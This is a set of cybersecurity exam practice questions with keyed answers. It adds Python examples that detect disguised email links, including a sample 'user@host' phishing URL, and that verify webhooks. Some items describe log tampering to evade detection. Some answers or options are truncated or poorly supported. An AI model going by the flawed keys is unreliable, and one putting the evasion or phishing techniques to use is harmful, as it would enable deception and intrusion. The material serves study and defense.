Which of the following tools will allow a security analyst to run the module auxiliary/admin/networking/cisco_secure_acs_bypass to scan for vulnerabilities on a Cisco device? A. Metasploit Framework B. Nmap C. Recon-ng D. Pacu

A. Metasploit Framework The Metasploit Framework has a module library with the auxiliary/admin/networking/cisco_secure_acs_bypass module available for use. Administrators specify the module using these paths in the library.

A hair salon's web application allows customers to schedule appointments with their stylists. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. Therefore, the hair salon requests that the software vendor address the security risks while limiting the software's access to the hair salon's internal network. What kind of risk response does this represent? A. Mitigation B. Acceptance C. Transference D. Avoidance

A. Mitigation Risk mitigation describes reducing exposure to risk items by implementing mitigating controls to ensure that technical business operations remain safe.

A security analyst at a large financial institution has recently noticed an increase in unexpected outbound communication and is concerned about potential data exfiltration. Which of the following actions should the analyst take to address this? (Select the three best options.) A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems D. Block all outbound traffic from the organization's network to mitigate data loss during the investigation

A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems Monitoring network traffic is essential in detecting suspicious outbound connections because the analyst can identify any unusual outbound traffic patterns and investigate further. Implementing network segmentation can prevent lateral movement by attackers and limit their ability to access sensitive data. Checking for malware or malicious software on the organization's systems is also crucial in identifying any malicious activity causing unexpected outbound communication.

A network engineer is gathering requirements from a security operations center (SOC) analyst. Which of the following requirements might lead the engineer to suggest deploying a honeypot? (Select the two best options.) A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. C. The organization needs to minimize human interaction through orchestration. D. Analysts need the ability to code in XML.

A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources. Indicators of compromise (IoCs) are items that suggest a compromise may have occurred. Indicators of attack (IoAs) are items that can identify an ongoing attack.

A network administrator is deploying a new layer 3 switch for the company. The manager mentioned that the traffic flow needed to be more predictable, easier to monitor, and simpler to filter. What should the administrator implement during the setup to include the security and performance benefits the manager requested? A. Network segmentation B. Supervisory control and data acquisition system C. Industrial control system D. Network sensor

A. Network segmentation The network administrator should implement segmentation using virtual private networks (VPNs) or virtual local area networks (VLANs), since the switch operates at layer 3 of the Open Systems Interconnection (OSI) model. This enforces a security zone by separating a network segment from the rest of the network.

Which of the following are reasons a security operations center (SOC) manager might consider implementing a security orchestration, automation, and response (SOAR)? (Select the two best options.) A. Notices analysts performing a high volume of mundane tasks to clear SIEM alerts B. Identifies a high volume of false positives in the SIEM C. Identifies a honeypot D. Identifies analysts threat hunting

A. Notices analysts performing a high volume of mundane tasks to clear SIEM alerts B. Identifies a high volume of false positives in the SIEM Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to alerts generated by a security information and event management (SIEM) system. When something triggers an alert, the system can analyze it by following a defined set of instructions. A SOAR is an effective way to resolve false positive alerts in a SIEM using automated analysis.

A security researcher identifies a financial fraud scheme targeting multiple pharmaceutical companies. What type of actor is most likely responsible for this activity? A. Organized crime B. Nation state C. Hacktivists D. Script kiddie

A. Organized crime Organized crime refers to malicious activity characterized by the generation of illicit profit. Frequently, this activity involves financial fraud and blackmail.

A large financial institution is considering passwordless authentication and SSO as part of a new incident response and management plan to improve security and streamline operations. Which of the following is true about passwordless authentication and SSO in incident response and management? A. Passwordless authentication and SSO can help reduce incident response and management time. B. Passwordless authentication and SSO are not suitable for incident response and management as they create additional security risks and complexities. C. Passwordless authentication and SSO are only useful for small organizations with limited security needs. D. Passwordless authentication and SSO can only be used for incident response and management in large organizations.

A. Passwordless authentication and SSO can help reduce incident response and management time. Passwordless and single sign-on (SSO) are two authentication technologies frequently used in incident response and management. Incident response and management involves handling cybersecurity incidents in a systematic manner and includes detection, analysis, containment, eradication, and recovery.

A cybersecurity analyst is investigating a potential security incident within an organization. The analyst needs to apply knowledge of host indicators to ensure an accurate and thorough analysis. What action should the analyst prioritize? A. Perform data and log analysis B. Validate the integrity of data C. Update antivirus signatures D. Implement data loss prevention solutions

A. Perform data and log analysis Analyzing data and logs enables the cybersecurity analyst to identify suspicious activities and potential host indicators of compromise. This process is essential for an accurate and thorough security incident analysis.

A security analyst is scheduling a vulnerability scan on several company critical systems. What process should the analyst consider for false positives, scan speeds, and system identification? A. Performance B. Operations C. Fuzzing D. Device fingerprinting

A. Performance When performing vulnerability scans, it is important to consider identifying the operating system of the targets. Additionally, scan speed is important as it can affect the accuracy of the scan results. Identifying and managing false positives reduces the time spent researching and validating them and increases the accuracy of the scan results.

The security team at an organization has noticed an increase in suspicious activity on their network. They must determine the underlying causes behind these activities to prevent future occurrences. Which technique would best help the team identify the reasons for the suspicious activity on their network? (Select the two best options.) A. Performing root cause analysis B. Performing forensic analysis C. Attending security awareness training sessions D. Performing regular vulnerability assessments

A. Performing root cause analysis B. Performing forensic analysis Conducting root cause analysis allows the team to investigate the factors contributing to the issue. It helps identify the reasons for the suspicious activity on their network, enabling them to address the problem at its source.

When gathering requirements for a new firewall, a security engineer realizes an out-of-the-box device will not meet all of the organization's needs. However, it is possible to cover all the requirements by purchasing additional features. What is this extended functionality called? (Select the two best options.) A. Plugins B. Apps C. APIs D. Data enrichment

A. Plugins B. Apps Plugins, also called extensions, are tools that add functionality to existing hardware or software without altering the original program. They increase the functionality of security tools. Apps, or applications, are additional programs designed to run on another hardware or software platform. Engineers frequently use them to increase the functionality of security tools, often for an additional fee.

A facility security officer oversees the installation of a multi-layered, hardened steel door for the corporation's most sensitive server room. What security control functional type does this represent? A. Preventative B. Managerial C. Operational D. Technical

A. Preventative Preventative controls are a functional control type that eliminates or reduces the likelihood that an attack can succeed. For example, installing a multi-layered steel door to protect the server room is a preventative control measure.

A penetration tester has gained user-level access through a credential-stuffing attack against a Windows host in the target network. The Windows host's security logging policy will show multiple failed login attempts. To avoid detection, the penetration tester needs to modify the security logs to conceal their presence. What is the biggest obstacle the penetration tester will face in attempting this? A. Privileges required B. User interaction C. Attack complexity D. Windows Defender

A. Privileges required User-level privileges are insufficient to modify Windows Security Logs, which makes privilege escalation a top priority for the penetration tester.

A penetration tester has gained user-level access through a remote code execution vulnerability on a UNIX server in the target network. The UNIX server's syslog daemon will record multiple failed login attempts, so the syslog files need modifying to avoid detection and conceal the penetration tester's presence. What first step must the penetration tester take to achieve this? A. Privileges required B. User interaction C. Attack complexity D. Establish persistence

A. Privileges required Just as user-level privileges are insufficient to modify Windows Security Logs, they are insufficient to modify protected syslog files. Therefore, the penetration tester must escalate privileges to clear the syslog files successfully.

One of the debugging application's windows shows a light blue name, LoadLibraryA, in a single column. What is the purpose of these callouts, as displayed in the disassembly window of the application? A. Program functions B. CPU registers C. Hex view of program D. First breakpoint in command-line interface

A. Program functions Program functions, like LoadLibraryA or SendMessageW, display in blue in the last column of the disassembly window.

Which of the following concepts related to security operations involves the use of digital certificates to establish trust between entities and secure communication channels? A. Public key infrastructure (PKI) B. Single sign-on (SSO) C. Intrusion detection system (IDS) D. Firewall

A. Public key infrastructure (PKI) PKI is a framework that enables secure communication by using digital certificates to authenticate and establish trust between entities. Secure Sockets Layer (SSL) is a protocol that uses PKI to secure communication channels such as web traffic.

A malicious actor is combing through LinkedIn to find email addresses to target in an upcoming campaign. Which of the following terms describe this activity? (Select the three best options.) A. Reconnaissance B. OSINT collection C. Social media exploitation D. Threat hunting

A. Reconnaissance B. OSINT collection C. Social media exploitation Reconnaissance is an initial step in network exploitation. It involves gathering information that will be useful for conducting malicious activity. Open-source intelligence (OSINT) refers to any information that is readily available on the public internet. Social media exploitation refers to gathering data from communities like LinkedIn, Facebook, and Glassdoor where varying degrees of information are available about a targeted organization.

Which of the following is a benefit of vulnerability management reporting? A. Reduced response time to cyber threats B. Higher risk of cyberattacks C. Decreased awareness of potential weaknesses in systems D. Increased complexity of IT infrastructure

A. Reduced response time to cyber threats Vulnerability management reporting aims to improve an organization's response to cyber threats. By incorporating vulnerability management into the incident response plan, organizations can efficiently identify and respond to security incidents, minimizing damage and downtime.

What are the benefits of network segmentation in security operations, specifically in relation to system and network architecture concepts and operating system (OS) concepts? (Select the two best options.) A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity C. Increasing network performance by reducing network congestion D. Enabling easier access to resources across different network segments

A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity Network segmentation is a security practice that divides a network into smaller, isolated segments, reducing the attack surface by limiting access to sensitive resources. Network segmentation enables more effective monitoring of network traffic and detection of anomalous activity, making it easier for security teams to identify and respond to potential threats.

A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high-level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment? A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts B. Use strong passwords and enforce password policies to prevent unauthorized access to user accounts C. Block access to the organization's network from external sources to prevent attacks and data breaches D. Implement a firewall to monitor all incoming and outgoing network traffic to identify suspicious activity

A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts Regularly reviewing and auditing user accounts identifies accounts that should be disabled, have been compromised, or have been granted unauthorized access privileges to the organization's systems.

An emergency management director for a large bank has extensive plans for use in the event of a natural disaster. These plans include details on the continuity of operations and restoring services to the public after a catastrophic event. Which security control functional type best describes this situation? A. Responsive B. Managerial C. Operational D. Corrective

A. Responsive Responsive controls serve to direct corrective actions enacted after an incident occurs. For example, in a Security Operations Center (SOC), responsive controls might include several well-defined actions by an analyst after identifying a specific issue. The analyst documents these actions in a playbook. Detailed plans on how to continue operations and restore services are responsive controls.

The network team is assessing the cloud infrastructure of an Amazon Web Services (AWS) account and needs to determine which groups have access to the cloud storage. Where should the network team search for the information in the HTML report? A. S3 buckets config B. Network VPCs C. Config dashboard D. iam__enum_permissions module

A. S3 buckets config The S3 buckets are the storage assets on AWS, and the S3 buckets config section will show a list of groups with access to the buckets via the Identity and Access Management (IAM) policies.

What system manages large-scale, multiple-site devices and equipment spread over geographically large areas from a housed server to field devices? A. SCADA B. ICS C. PLC D. HMI

A. SCADA Supervisory control and data acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A cybersecurity analyst has noticed an increase in suspicious activity on the network. They consider implementing a security information and event management (SIEM) solution and endpoint detection and response (EDR) solution to help identify and respond to potential threats. What is a potential benefit of implementing both a SIEM and EDR solution in a security operations environment? A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. B. SIEM can provide in-depth analysis of endpoint activity, while EDR can identify and prevent malicious network traffic from entering the network. C. SIEM can identify and prevent malware from infecting endpoints, while EDR can monitor and report on network activity to identify potential threats. D. SIEM can prevent unauthori

A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats.

A new cybersecurity team is seeking a solution that can automate the company's security operations, incident response, threat intelligence, and vulnerability management systems. Which of the following terms best describes this solution? A. SOAR B. SIEM C. EDR D. NAC

A. SOAR Security orchestration, automation, and response (SOAR) is a solution that automates security operations and integrates security tools, allowing organizations to improve their ability to detect and respond to threats quickly and efficiently.

A social media application has a feature that allows users to enter the URL of a video to share their favorite video. An attacker submits a specially crafted URL that includes a call to the social media company's internal network resource, and the web application processes the request without proper validation. The internal network, trusting the web application, complies with the malicious call, permitting the attacker to steal sensitive information from the internal network. What type of vulnerability does this situation describe? A. SSRF B. XSS C. Cryptographic failures D. Broken access control

A. SSRF Server-side request forgery (SSRF) is a security vulnerability where an attacker tricks a web application into sending malicious HTTP requests to an internal or external network resource that trusts the web application. It potentially leads to data theft or system compromise.

The management information director is responsible for identifying and addressing any newly discovered vulnerabilities before attackers can exploit them. With new software being deployed on the network and vendor updates constantly rolling out, what should the director pay close attention to in order to run vulnerability scans in a timely manner? A. Scheduling B. Operations C. Performance D. Compliance

A. Scheduling Regular vulnerability scans help ensure that installed patches are effective and do not introduce new vulnerabilities. Scheduling vulnerability scans is essential to ensure that an organization's systems and networks remain secure before malicious actors may exploit weaknesses.

An information architect is currently in the process of labeling data assets for inventory use. The data inventory contains intellectual property, customer data, and confidential corporate data. How does the architect catalog these data types into the inventory? A. Sensitivity levels B. Performance use C. Segmented zone D. Technical controls

A. Sensitivity levels The architect uses sensitivity levels, which categorize the data assets an organization creates, controls, or maintains according to how much harm their disclosure or loss would cause; intellectual property, customer data, and confidential corporate data each receive a level, and the level drives the controls applied to them.

A cybersecurity organization faces challenges with key performance indicators (KPIs). Which of the following is a potential challenge that the organization may face while setting service-level objectives (SLOs)? A. Service-level objectives (SLOs) must be measurable to be effective. B. Key performance indicators (KPIs) must be absent for service-level objectives (SLOs) to be measurable. C. Service-level objectives (SLOs) are not comprehensive enough. D. Key performance indicators (KPIs) are not measurable.

A. Service-level objectives (SLOs) must be measurable to be effective. Service-level objectives (SLOs) can be challenging for cybersecurity organizations due to the changing cybersecurity landscape and capabilities of the organization. Therefore, SLOs should be flexible and adaptable to ensure they remain relevant and useful. This means that cybersecurity organizations may need to change their SLOs over time to reflect changes in the cybersecurity landscape and their organization's capabilities.

A cybersecurity specialist is checking a link to a news article within a colleague's email. The email appears to be genuine, but the link is deliberately obscured. The specialist suspects that the link may be part of a social engineering attack that aims to exploit the organization's security vulnerabilities. What is the role of obfuscated links in social engineering attacks and their impact on IT security operations? (Select the three best options.) A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. D. Obfuscated links a

A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering exploits human tendencies such as trust and curiosity to gain unauthorized access to information or networks. Obfuscated links fit that model: the displayed text, a URL shortener, percent-encoding, a look-alike domain, or a user@host prefix hides the real destination, so a user who believes the link leads to a news article instead lands on a page that harvests credentials or installs malware. For IT security operations this means inspecting the actual href rather than the visible text and treating a mismatch between the two as an indicator worth escalating.
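As an added example, not part of the study set, the following Python pulls every link out of an email body and flags the tricks named above: a visible URL that differs from the real one, credentials placed before the host, a raw IP address, and punycode labels. The sample HTML is constructed for the example and the two-label "registrable domain" rule is a simplification.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of an email body: one disguised link and two honest ones.
SAMPLE_EMAIL_HTML = """
<p>Breaking story: <a href="http://news.example.com@203.0.113.7/login">news.example.com/story/42</a></p>
<p>Archive: <a href="https://news.example.com/story/41">news.example.com/story/41</a></p>
<p><a href="https://news.example.com/unsubscribe">Unsubscribe</a></p>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_of(url):
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def registrable_domain(host):
    # Assumption: last two labels; production code would consult the public suffix list.
    return ".".join(host.rstrip(".").split(".")[-2:])


def link_warnings(href, text):
    """Reasons this link looks obfuscated; an empty list means nothing suspicious."""
    reasons = []
    try:
        parts = urlsplit(href)
    except ValueError:
        return ["href is not a parseable URL"]
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        reasons.append("userinfo before the real host (user@host trick)")
    try:
        ipaddress.ip_address(host)
        reasons.append("raw IP address instead of a hostname")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label (possible homograph)")
    # Visible text that itself looks like a URL must point where it says it does.
    shown = _host_of(text if "://" in text else "http://" + text)
    if "." in shown and " " not in text and registrable_domain(shown) != registrable_domain(host):
        reasons.append(f"text shows {shown} but href goes to {host}")
    return reasons


def scan_email(html):
    """Return [(href, reasons)] for every link that has at least one warning."""
    collector = LinkCollector()
    collector.feed(html)
    return [(href, r) for href, t in collector.links if (r := link_warnings(href, t))]


if __name__ == "__main__":
    for href, reasons in scan_email(SAMPLE_EMAIL_HTML):
        print(href, "->", "; ".join(reasons))
```

Run against the sample, only the first link is reported, with all three of its problems listed. The same checks apply to a URL pasted from an email client's status bar; what they cannot see is where a shortener or an open redirect finally lands, which is why a sandboxed fetch of the final destination is the usual next step in a SOC playbook.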

What is a true statement about the factors concerning the use of top 10 style lists? A. They allow for a quick and easy overview of important activities and trends. B. They provide an exhaustive list of all potential problems. C. They are useful for developing policies and procedures but not effort prioritization. D. They are ineffective when used in a detailed report.

A. They allow for a quick and easy overview of important activities and trends. Top 10 lists effectively highlight potential problems or focus on important activities, trends, or environmental changes. They are a quick and easy way to gain an overview of what is happening within a system, and they can identify potential problems that may need further investigation.

What are compensating controls used for? A. To add additional layers of security when traditional measures are not viable B. To replace primary security measures C. To track and control changes in system configuration D. To ensure that security approaches and capabilities are aligned with changing business requirements

A. To add additional layers of security when traditional measures are not viable Compensating controls provide additional layers of security to protect against malicious or accidental breaches when the primary control cannot be applied, for example when a patch cannot be installed on a legacy system. Compensating controls should be tailored to the organization's specific security needs and regularly reviewed and updated to ensure they remain effective.

A large organization tasked a cybersecurity analyst with improving the organization's understanding of potential attack methodologies. How would the analyst effectively comprehend and analyze different attack strategies employed by adversaries? A. Train on the cyber kill chain framework B. Conduct forensic analysis C. Attend security awareness training sessions D. Implement an intrusion prevention system (IPS)

A. Train on the cyber kill chain framework By training on the cyber kill chain framework, a cybersecurity analyst can gain a better understanding of the different attack methodologies and strategies employed by adversaries.

The Common Vulnerability Scoring System (CVSS) scoring for a newly deployed virtual appliance has reached 9.4. The attack vectors in the report included physical and network paths. Some of the other metrics in the report included: Privileges Required (PR) with a value of 'N' and User Interaction (UI) with a value of 'N.' After reviewing the details of the CVSS report, which response would a systems security officer provide to the appliance administrators to resolve most of the issues immediately? A. Use only Active Directory (AD) groups and/or configure roles B. Verify physical access logs to server racks C. Setup data-at-rest encryption for the SQL database D. Setup a new local account with a complex password

A. Use only Active Directory (AD) groups and/or configure roles Privileges Required (PR) of 'N' (None) means an attacker needs no account or privileges to exploit the vulnerability, so an anonymous user can reach the vulnerable functionality; User Interaction (UI) of 'N' means no victim action is needed either. Enforcing authentication and role-based access through AD groups or configured roles removes that anonymous path and closes off most of the reported findings at once.

A security analyst is investigating a security incident that has affected several workstations in their organization. The analyst needs to gather evidence from the affected hosts to determine the extent of the compromise and identify the malicious actor's tactics. Which of the following should the analyst use to effectively explore host indicators related to this incident? A. Utilizing forensic analysis tools B. Developing an incident response plan C. Conducting tabletop exercises D. Performing root cause analysis

A. Utilizing forensic analysis tools Forensic analysis tools help the security analyst collect and analyze evidence from affected hosts, such as log files, memory dumps, and file system artifacts. These tools are essential for exploring host indicators and understanding the nature of the security incident.

A company wants to implement a method of integrating third-party applications with their system. They want to automate the process of receiving real-time updates from external systems without having to poll them. Which technology would best fit their needs? A. Webhooks B. APIs C. Plugins D. Single pane of glass

A. Webhooks Webhooks allow real-time data transfer between two systems by sending a notification to the receiving system when specific events occur in the sending system. Webhooks are useful to trigger automated actions such as an update.

Each time a specific event occurs, a security architect wants to update a database with standard information generated by the alert. What is an effective automated mechanism to accomplish this goal? A. Webhooks B. Plugins C. Data enrichment D. Team coordination

A. Webhooks Webhooks are automated messages sent from an app to a unique URL and include relevant information about the event and when the event occurred.
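The two webhook questions above describe the receiving side: an external system posts event data to a URL, and the receiver records it. As an added example, not code from the study set or from any product, the following Python implements that receiver with the checks a practitioner would want before trusting an inbound webhook: an HMAC signature over the body, a timestamp to bound replays, and a parameterized insert into the alert database. The header names, the shared secret, and the alert schema are assumptions for the example.

```python
import hashlib
import hmac
import json
import sqlite3
import time

WEBHOOK_SECRET = b"example-shared-secret"   # assumption: provisioned out of band and rotated
MAX_SKEW_SECONDS = 300                      # reject deliveries timestamped outside this window


def new_alert_db():
    """In-memory SQLite table for the example; event_id is the primary key so replays collide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alerts (event_id TEXT PRIMARY KEY, severity TEXT, "
                 "host TEXT, received_at INTEGER)")
    return conn


def sign(body, timestamp, secret=WEBHOOK_SECRET):
    """HMAC-SHA256 over timestamp and raw body, hex encoded; the sender computes the same value."""
    return hmac.new(secret, timestamp.encode() + b"." + body, hashlib.sha256).hexdigest()


def verify(body, timestamp, signature, secret=WEBHOOK_SECRET, now=None):
    now = time.time() if now is None else now
    try:
        if abs(now - int(timestamp)) > MAX_SKEW_SECONDS:
            return False
    except ValueError:
        return False
    # constant-time comparison so the check does not leak how many bytes matched
    return hmac.compare_digest(sign(body, timestamp, secret), signature)


def handle_webhook(conn, headers, body, now=None):
    """Return an HTTP-style status: 401 bad signature, 400 bad payload, 409 replay, 200 stored."""
    if not verify(body, headers.get("X-Timestamp", ""), headers.get("X-Signature", ""), now=now):
        return 401
    try:
        event = json.loads(body)
        received = int(now if now is not None else time.time())
        row = (event["id"], event["severity"], event["host"], received)
    except (ValueError, KeyError, TypeError):
        return 400
    try:
        # parameterized insert: alert fields never become part of the SQL text
        conn.execute("INSERT INTO alerts VALUES (?, ?, ?, ?)", row)
    except sqlite3.IntegrityError:
        return 409   # same event_id already stored: a replayed delivery
    return 200


def alert_count(conn):
    return conn.execute("SELECT COUNT(*) FROM alerts").fetchone()[0]


if __name__ == "__main__":
    db = new_alert_db()
    payload = json.dumps({"id": "evt-0001", "severity": "high", "host": "ws-17"}).encode()
    ts = str(int(time.time()))
    hdrs = {"X-Timestamp": ts, "X-Signature": sign(payload, ts)}
    print(handle_webhook(db, hdrs, payload), handle_webhook(db, hdrs, payload), alert_count(db))
```

The signature must be computed over the raw bytes received, before any JSON parsing, because re-serializing can change whitespace and key order. Without the timestamp an attacker who captures one valid delivery could resend it indefinitely; without the unique event_id the same delivery could be stored twice inside the allowed window.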

A small financial services firm has experienced a ransomware attack that has resulted in the loss of critical financial data. What information should be included in the incident report to ensure an effective incident response? (Select the three best options.) A. What types of data were affected? B. What was the order of the events for the attack? C. What was the date and time of the attack? D. Who was responsible for the attack?

A. What types of data were affected? B. What was the order of the events for the attack? C. What was the date and time of the attack? Effective incident reporting should include the "who, what, when, where, and why" of the incident. In the case of a ransomware attack that has resulted in the loss of critical financial data, including the types of data affected is especially important. This information will help assess the potential impact of the incident and develop appropriate remediation measures. It is especially important to include information about the attack's order of events in the incident report's timeline. Including information about the attack's date and time in the incident report's timeline is also important.

A security analyst is investigating a potential security breach in the company's network. The analyst is using Wireshark and tcpdump to analyze the network traffic and detect any suspicious activity. Which tool can be used to view the network packets in real time and analyze them using a graphical user interface, while the other tool captures network packets and displays them in a text-based format? A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. B. Wireshark and tcpdump are both command-line tools the analyst can use for network analysis. C. Wireshark and tcpdump are both graphical user interface tools the analyst can use for network analysis. D. Tcpdump is a graphical user interface tool, while Wireshark is a command-line tool.

A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. The analyst can utilize Wireshark, a graphical user interface tool, to view network packets in real time and analyze them in a user-friendly way.

Which of the following show how system and network architecture concepts are related to security operations? (Select the three best options.) A. Zero trust B. Cloud access security broker (CASB) C. Secure access service edge (SASE) D. Firewall rules alone

A. Zero trust B. Cloud access security broker (CASB) C. Secure access service edge (SASE) System and network architecture concepts are vital in security operations. Zero trust emphasizes network segmentation and per-request access control to limit access to sensitive resources, reducing the attack surface. CASB technology protects cloud-based resources by providing visibility into cloud usage, enforcing access control policies, and adding threat protection to mitigate risks associated with cloud services. SASE combines network security, access control, and wide area network (WAN) capabilities into a cloud-delivered service that secures connectivity and ensures only authorized access to critical resources.

A financial institution has experienced a cyber attack that has resulted in the theft of customer information. Which of the following is the most critical consideration for the incident response team? A. Incident declaration B. Stakeholders impacted C. Timeline of breach D. Evidence

B. Stakeholders impacted Determining the stakeholders impacted is an important part of crisis management. It is the most critical consideration for the incident response team.

A security operations center (SOC) manager is working to define the playbooks for a new security orchestration, automation, and response (SOAR) and wants to check URLs against VirusTotal automatically. What is an efficient and cost-effective way to automate this function? A. Single pane of glass B. API C. Webhook D. Plugin

B. API An application programming interface (API) automates communications between two or more applications. An API defines the types and formats of calls the system can make and is often free to use.

A large corporation has asked a facility security officer to install a system or implement a procedure that will assist in the discovery of threats or compromises. Which of the following is a suitable control for this situation? A. Turnstiles B. Account reviews C. Bollards D. Chain link fence

B. Account reviews Account reviews are a detective control since they attempt to find whether some form of suspicious activity has occurred on an account. This type of detective control can discover malicious activity using a legitimate account.

While reviewing alerts, an analyst notices a new signature is generating a high volume of false positives. This appears to be the result of an error in the way the signature is written. This represents an issue with what attribute of threat intelligence? A. Relevancy B. Accuracy C. Timeliness D. Reconnaissance

B. Accuracy Accuracy describes the correctness of threat intelligence. Accurate information is free of errors and biases.

After performing an automated scan on the OWASP Zed Attack Proxy (ZAP) tool, where can a security analyst find detailed information about a vulnerability finding such as cross-site scripting and its associated risk level? A. Advisory tab B. Alerts tab C. Event log panel D. Spider tab

B. Alerts tab The alerts tab is available on the Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP) tool. Clicking on a specific finding in the alert list will provide the vulnerability's URL, risk, and description.

Where would a network administrator find cross-domain misconfiguration in the Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP) application after an automated scan of the local web server? A. Spider tab B. Alerts tab C. Dispatchers tab D. Intruder tab

B. Alerts tab The alerts tab will populate the results of some attacks performed on the list of URLs from the spider tab. Cross-Domain misconfiguration is one example of available alerts.

A cybersecurity professional for a large organization is identifying malicious activity through analysis. When responding to a potential security incident, which action should the professional prioritize to manage the situation effectively? A. Implement a legal hold on potentially relevant data B. Assess the impact of the incident on the organization C. Perform a vulnerability scan on all network devices D. Update firewall rules to block all incoming traffic

B. Assess the impact of the incident on the organization When responding to a potential security incident, it is crucial to assess the impact of the incident on the organization. This will help them understand the severity of the situation, prioritize their response efforts, and allocate resources effectively to manage the incident.

A security operations center (SOC) manager identifies a list of frequently performed tasks. What might the SOC manager consider doing with these tasks? A. Using active defense B. Automating them C. Threat hunting D. Collecting OSINT

B. Automating them Automating frequently performed tasks can improve effectiveness, reduce response times, and free up resources to perform more valuable work.

Which of the following vulnerabilities allows attackers to obtain or change data or functionality they are otherwise not authorized to obtain or change? A. Security misconfiguration B. Broken access control C. Software and data integrity failures D. Injection

B. Broken access control Broken access control is a common vulnerability in web applications that can allow attackers to access sensitive data or perform unauthorized actions that change data or functionality, such as manipulating a URL.

A company has a web application that allows users to submit comments on a blog post. The application accepts comments of up to 200 characters and stores them in a fixed-sized temporary memory space without sanitizing input. An attacker takes advantage of this vulnerability by submitting a comment much longer than 200 characters. The attacker's comment contains malicious code designed to overwrite adjacent memory and execute arbitrary commands on the server. What type of attack is this? A. Integer overflow B. Buffer overflow C. Persistent XSS D. SSRF

B. Buffer overflow A buffer overflow attack attempts to write more data to a program's buffer (temporary storage area in memory) than it can hold, so the program executes malicious code in adjacent memory spaces.

A hacker finds a vulnerability in a web server within a target organization. By sending specially crafted input to the HTTP service, the hacker exceeds the program's memory capacity and causes the web server to exercise arbitrary commands. What type of attack is this? A. Integer overflow B. Buffer overflow C. Persistent XSS D. Session management

B. Buffer overflow A buffer overflow attack attempts to write more data to a program's buffer (temporary storage area in memory) than it can hold, so the program executes malicious code in adjacent memory spaces.

A company experienced a cyberattack that disrupted its normal operations. The attack resulted in the loss of customer data and a halt in product and service delivery. What is this scenario an example of? A. Organizational governance B. Business process interruption C. Degraded functionality D. Shareholder accountability

B. Business process interruption Business process interruption describes a disruption in an organization's normal operations. In this example, a cyber attack caused business process interruption, resulting in lost revenue, increased costs, and missed opportunities.

Which of the following might help a company coordinate the response to a cyberterrorist attack? (Select the two best options.) A. MITRE ATT&CK B. CERT C. OSINT D. CSIRT

B. CERT D. CSIRT A computer emergency response team (CERT) is a group tasked with mitigating and minimizing the impact of malicious activity; national and sector CERTs coordinate across multiple organizations to ensure an effective response to major incidents. A computer security incident response team (CSIRT) is the organization's own group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.

A network administrator assesses multiple attack vectors revealed from a recent vulnerability scan of the system's cloud-based software. Which of these CVSS scores presents the greatest threat to Availability Impact? A. CVSS:7.9/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L B. CVSS:5.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H C. CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N D. CVSS:2.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

B. CVSS:5.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS:5.6 ... /A:H indicates a Common Vulnerability Scoring System (CVSS) score of 5.6 and an Availability Impact of High (:H). It has the highest CVSS score with a high impact on Availability resulting in the greatest overall impact to Availability of the options presented.

